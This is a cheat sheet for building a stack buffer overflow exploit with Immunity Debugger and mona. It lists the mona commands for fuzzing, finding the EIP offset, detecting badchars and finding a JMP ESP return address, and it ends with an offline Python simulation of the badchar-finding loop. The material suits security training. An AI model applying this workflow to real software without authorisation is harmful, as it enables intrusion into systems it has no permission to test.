1. Open Immunity Debugger as administrator and open the exe.

2. Set the mona working directory:

!mona config -set workingfolder c:\mona\

3. Run the fuzzer script.

Fuzzer Script

4. Generate a pattern with mona, using the last value the fuzzer script reached plus 100/200:

!mona pattern_create 2000

5. Copy the pattern from the filesystem and append it to the pattern script.

Pattern Script

6. After running the pattern script, copy the EIP value and run mona to obtain the offset:

!mona pattern_offset <EIP_value>

7. Obtain the badchar list with mona, already skipping \x00, and run the badchar script:

!mona bytearray -b "\x00"

Badchar

8. There are now two options to identify badchars. First: click ESP, follow in dump, and see which chars look like outliers. Second: run the mona command below. Mismatches usually show up as a run of consecutive badchars, but only the first one is valid: remove it and recheck.

!mona compare -f C:\mona\bytearray.bin -a <ESP_addr>

9. Obtain the return address with mona:

!mona jmp -r esp
# If this fails, filter by addresses which do not contain badchars
!mona jmp -r esp -cpb "\x00"

Then convert it to little endian:

Addr = 625011AF
retn = "\xAF\x11\x50\x62"
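The following is an added example (not from the original cheat sheet, and not mona's own code) that shows why the compare step above reports a run of consecutive badchars of which only the first is real, and how the remove-and-recheck loop converges; it also covers the little-endian conversion of the return address. The target is replaced by a constructed stand-in (`simulated_target_copy`, a hypothetical program that truncates at 0x0A and rewrites 0x0D) so the script runs offline.

```python
import struct

# Constructed stand-in for the vulnerable program (not a real target): it stops
# copying at a newline (0x0A) and rewrites a carriage return (0x0D) to a space.
def simulated_target_copy(payload: bytes) -> bytes:
    copied = bytearray()
    for b in payload:
        if b == 0x0A:
            break
        copied.append(0x20 if b == 0x0D else b)
    return bytes(copied)

def build_bytearray(exclude=(0x00,)) -> bytes:
    """Same idea as `!mona bytearray -b`: every value 0x00..0xFF minus the excluded ones."""
    return bytes(b for b in range(256) if b not in exclude)

def mismatch_positions(expected: bytes, dump: bytes) -> list:
    """Every index where memory differs from what was sent; a truncated dump counts
    as mismatching from the cut-off onwards. This is the raw view a compare gives."""
    return [i for i, b in enumerate(expected) if i >= len(dump) or dump[i] != b]

def first_badchar(expected: bytes, dump: bytes):
    """Only the first mismatch is trustworthy: the byte that was mangled or truncated
    corrupts everything behind it, so the run of consecutive mismatches is a side effect."""
    positions = mismatch_positions(expected, dump)
    return expected[positions[0]] if positions else None

def find_badchars(send_and_dump, exclude=(0x00,)) -> list:
    """The loop from the page: compare, drop the first bad byte, rebuild the array,
    resend and recompare until the array lands in memory unchanged."""
    bad = list(exclude)
    while True:
        expected = build_bytearray(bad)
        culprit = first_badchar(expected, send_and_dump(expected))
        if culprit is None:
            return [b for b in bad if b not in exclude]
        bad.append(culprit)

def to_little_endian(addr: int) -> bytes:
    """Pack a 32-bit address the way it has to be written into the payload."""
    return struct.pack("<I", addr)

if __name__ == "__main__":
    first = build_bytearray()
    raw = mismatch_positions(first, simulated_target_copy(first))
    print("raw mismatches on the first pass:", len(raw))  # 246, but only one byte is the cause
    print("bad chars:", [hex(b) for b in find_badchars(simulated_target_copy)])
    print("retn:", to_little_endian(0x625011AF))
```

Against the simulated target the first compare flags 246 positions, yet the loop needs only two rounds to isolate 0x0A and 0x0D, which is exactly why the page says to trust only the first mismatch and recheck.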